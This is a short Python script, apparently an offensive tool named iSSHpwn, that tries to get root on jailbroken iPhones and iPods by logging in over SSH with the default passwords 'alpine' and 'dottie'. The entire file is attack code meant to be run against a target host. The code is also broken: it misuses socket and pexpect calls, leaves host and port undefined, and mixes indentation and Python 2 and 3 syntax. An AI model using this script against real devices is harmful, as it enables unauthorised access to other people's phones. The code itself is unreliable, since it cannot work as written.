#!/usr/bin/python#iSSHpwn.pyimport os, pexpect, sysimport socketalpine = "a

1. #!/usr/bin/python
2. #iSSHpwn.py
3. import os, pexpect, sys
4. import socket
5.  
6. alpine = "alpine"  #Default for iPod / iPhone 2G is alpine
7. dottie = "dottie"  #Default for iPod / iPhone 1G is dottie
8.  
9.     print("\t[+] Welcome to iSSHpwn v0.2")
10.     print("\t[+] Trying to connect to port: 22( SSH) ..\n")
11.     print("-------------------------------------------")
12.  
13. try:
14.     buf = "\n"
15.     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16.     sock.connect((host,port))
17.     foo = sock.connect('ssh root@%s %s',host,port)
18.     foo.expect('.*ssword:')
19.     foo.sendline(alpine)
20.     foo.sendline(dottie)
21.     sock.sendall(buf)
22.     print("[+] Root acquired thru default passes ..")
23.     print("[+] Type 'logout' to end session ..")
24.     s= sock.recv(4000)
25.     foo.interact()
26.  
27. except:
28.     print("\t[+] Expl0it failed!")
29.     print("\t[+] Either the target is not jailbroken, SSH is closed or the password is neither alpine or dottie!")
30.     sys.exit()
31.  
32. if __name__=="__main__":
33.     if len(sys.argv)<3:
34.    print "usage: %s host port" % sys.argv[0]
35.    sys.exit()
36.    sock.connect(sys.argv[1],int(sys.argv[2]))